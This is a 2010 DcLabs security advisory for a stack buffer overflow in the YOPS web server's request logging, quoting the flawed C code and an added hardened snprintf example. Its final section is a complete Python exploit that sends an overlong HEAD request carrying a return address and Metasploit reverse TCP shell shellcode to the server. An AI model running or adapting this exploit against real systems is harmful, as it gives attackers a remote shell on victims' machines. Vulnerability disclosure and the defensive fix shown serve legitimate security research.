YOPS Remote Command Execution

Posted Sep 11, 2010
Authored by ipax | Site dclabs.com.br

YOPS (Your Own Personal [WEB] Server) version 2009-11-30 suffers from a remote buffer overflow vulnerability.

tags | exploit, remote, web, overflow
SHA-256 | 6694052f138560b7bda843c825debc8144e0312b513297460d9966fb3c62c18d

[DCA-00015]

[Software]

 - YOPS (Your Own Personal [WEB] Server)

[Vendor Product Description]

 - YOPS (Your Own Personal [WEB] Server) is a small SEDA-like HTTP
server for Linux OS written in C. There are 7 stages (accept, parse,
launch, fetch, error, send and log), and pipes are used as interstage
channels.

[Bug Description]

 - In the function http_parse_request_header the application fails to do a
boundary check on a malformed buffer received as an HTTP command
(HEAD/GET/POST) before using it as input for the logger variable in the
swebs_record_log function.

 --- http.c snippet ---
int http_parse_request_header(char *data, struct http_request_header *h)
{
       int r;
       int ver, rev;
       char *s, *tok, *l, *prm;
[...]
       /* the version is parsed, but the length of the request line is
          never checked here before it is handed on to the logger */
       r = sscanf(h->http, " HTTP/%d.%d ", &ver, &rev);
       if (r != 2)
               return -400;
[...]
}
 --- END snippet ---

 --- swebs.c snippet ---
int swebs_record_log(int log, JOB *job)
{
       int err;
       time_t now;
       char timestr[32];
       char logrec[MAX_REQUEST_LINE_LEN + 1];   /* fixed-size stack buffer */
[...]
       /* sprintf() performs no bounds check: job->hdr.request_line comes
          straight from the client request, so a long request line writes
          past the end of logrec */
       sprintf (
               logrec,
               "%s\t[%s]\t\"%s\"\t(%d+%d/%d)\t%d",
               job->client,
               timestr,
               job->hdr.request_line,
               job->response_hlen,
               job->response_blen_sent,
               job->response_blen,
               job->status
               );
[...]
}
 --- END snippet ---
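The two snippets above show the whole defect: a request line of attacker-chosen length is formatted with sprintf into a stack buffer of MAX_REQUEST_LINE_LEN + 1 bytes. The C block below is an added example and is not YOPS code; it shows the bounded form of the same log record (snprintf with a truncation flag) and the early length check the parser should apply. The struct job, the function names, the small MAX_REQUEST_LINE_LEN value and the sample request line are all assumptions made for this example.

```c
#include <stdio.h>
#include <string.h>

/* Assumed value for this example only (chosen small so the truncation path
 * is exercised); the real server defines its own MAX_REQUEST_LINE_LEN. */
#define MAX_REQUEST_LINE_LEN 64

/* Hypothetical stand-in for the JOB fields the log record uses; the field
 * names follow the advisory's swebs.c snippet. */
struct job {
    const char *client;
    const char *request_line;
    int response_hlen;
    int response_blen_sent;
    int response_blen;
    int status;
};

/* Hardened formatter: snprintf never writes more than outlen bytes, so an
 * oversized request line is cut, not spilled onto the stack.
 * Returns 0 when the record fit, 1 when it was truncated (caller may warn
 * and still emit the shortened line), -1 on an encoding error. */
int format_log_record(char *out, size_t outlen, const char *timestr,
                      const struct job *job)
{
    int n = snprintf(out, outlen, "%s\t[%s]\t\"%s\"\t(%d+%d/%d)\t%d",
                     job->client, timestr, job->request_line,
                     job->response_hlen, job->response_blen_sent,
                     job->response_blen, job->status);
    if (n < 0)
        return -1;
    return (size_t)n >= outlen ? 1 : 0;
}

/* Parser-side boundary check the advisory says is missing: reject a request
 * line longer than the limit before it reaches the logger. memchr stops at
 * the limit, so an unterminated oversized line is never scanned further.
 * Returns 1 if the line is acceptable, 0 otherwise. */
int request_line_within_limit(const char *request_line)
{
    return memchr(request_line, '\0', MAX_REQUEST_LINE_LEN + 1) != NULL;
}

/* Formats a constructed, well-formed request line; expected result 0. */
int demo_normal_request(void)
{
    struct job j = { "127.0.0.1", "HEAD / HTTP/1.1", 120, 0, 0, 200 };
    char logrec[MAX_REQUEST_LINE_LEN + 1];
    return format_log_record(logrec, sizeof logrec, "01/Jan/2010:00:00:00", &j);
}

/* Formats a constructed 199-byte request line. Expected result 1: the record
 * is truncated, stays NUL-terminated within the buffer, and the parser-side
 * check rejects the line (-1 / -2 signal that one of those guarantees broke). */
int demo_oversized_request(void)
{
    char big[200];
    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';

    struct job j = { "127.0.0.1", big, 120, 0, 0, 400 };
    char logrec[MAX_REQUEST_LINE_LEN + 1];

    int rc = format_log_record(logrec, sizeof logrec, "01/Jan/2010:00:00:00", &j);
    if (strlen(logrec) > MAX_REQUEST_LINE_LEN)
        return -1;
    if (request_line_within_limit(big))
        return -2;
    return rc;
}

int main(void)
{
    printf("normal request truncated: %d\n", demo_normal_request());
    printf("oversized request truncated: %d\n", demo_oversized_request());
    return 0;
}
```

The truncation flag matters in practice: a logger that silently drops the tail of a request line can hide the very request an investigator later wants to see, so the caller should record that truncation happened rather than only shortening the record.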

[History]

 - Advisory sent to vendor on 08/26/2010

[Impact]

 - High (Remote Command Execution)

[Affected Version]

 - YOPS 2009-11-30

 - Prior versions may also be vulnerable

[Code]

#!/usr/bin/python
# Software:
# YOPS (Your Own Personal [WEB] Server) is a small SEDA-like HTTP
# server for Linux OS written in C.
# URL: http://sourceforge.net/projects/yops2009/
#
# Vulnerability: Rodrigo Escobar aka ipax @ DcLabs
# Exploit: Flavio do Carmo Junior aka waKKu @ DcLabs
# Contact: waKKu <AT> dclabs <DOT> com <DOT> br

import socket
import sys
import time

HOST = "localhost"
PORT = 8888

# Padding length before the return address; may be overridden on the command line
try:
    BUFF_LEN = int(sys.argv[1])
except (IndexError, ValueError):
    BUFF_LEN = 802
FIXUP_ADDR = "\x47\xce\x04\x08"

shellcode = (
    # MetaSploit Reverse TCP Shell. Host: 127.0.0.1 - Port: 4444
    "\x33\xc9\xb1\x13\xbe\xae\x88\x55\xcb\xda\xcd\xd9\x74\x24\xf4"
    "\x5f\x31\x77\x0e\x03\x77\x0e\x83\x69\x8c\xb7\x3e\x44\x56\xc0"
    "\x22\xf5\x2b\x7c\xcf\xfb\x22\x63\xbf\x9d\xf9\xe4\x9b\x3f\x6a"
    "\x9a\x1b\xbf\x6b\x02\x74\xae\x37\xac\xd7\xba\xd7\x61\x88\xb3"
    "\x39\xc2\x42\xa5\xe1\x08\x12\x70\x95\x4a\xa3\xbd\x54\xec\x8d"
    "\xb8\x9f\xbd\x65\x15\x4f\x4d\x1e\x01\xa0\xd3\xb7\xbf\x37\xf0"
    "\x18\x6c\xc1\x16\x28\x99\x1c\x58\x43"
)

# Request line: method, padding, return address, then the HTTP version
buffer = "HEAD "
buffer += "A" * BUFF_LEN
buffer += FIXUP_ADDR * 4
buffer += " HTTP/1.1"

stackadjust = (
    "\xcb"                  # instruction alignment
    "\xbc\x69\x69\x96\xb0"  # Stack Adjustment
)

payload = buffer + stackadjust + shellcode + "\r\n\r\n"

print """
######################################
### DcLabs Security Research Group ###
### +Exploit+ ###
######################################
Software: YOPS 2009 - Web Server
---
Vulnerability by: ipax
Exploit by: waKKu
Greetings to: All DcLabs members
"""

print " [+] Using BUFF_LEN -> ", str(BUFF_LEN)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print " [+] Trying to establish connection..."
s.connect((HOST, PORT))
print " [+] Sending a dummy request to initialize data..."
s.send("HEAD DcLabs HTTP/1.1\r\n\r\n")
try:
    s.recv(1024)
except socket.error:
    pass
s.close()

time.sleep(3)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
print " [+] Sending our malicious payload..."
s.send(payload)
print " [+] Payload sent, good luck!"
s.close()


--
Rodrigo Escobar (ipax)
Pentester/Researcher Security Team @ DcLabs
http://www.dclabs.com.br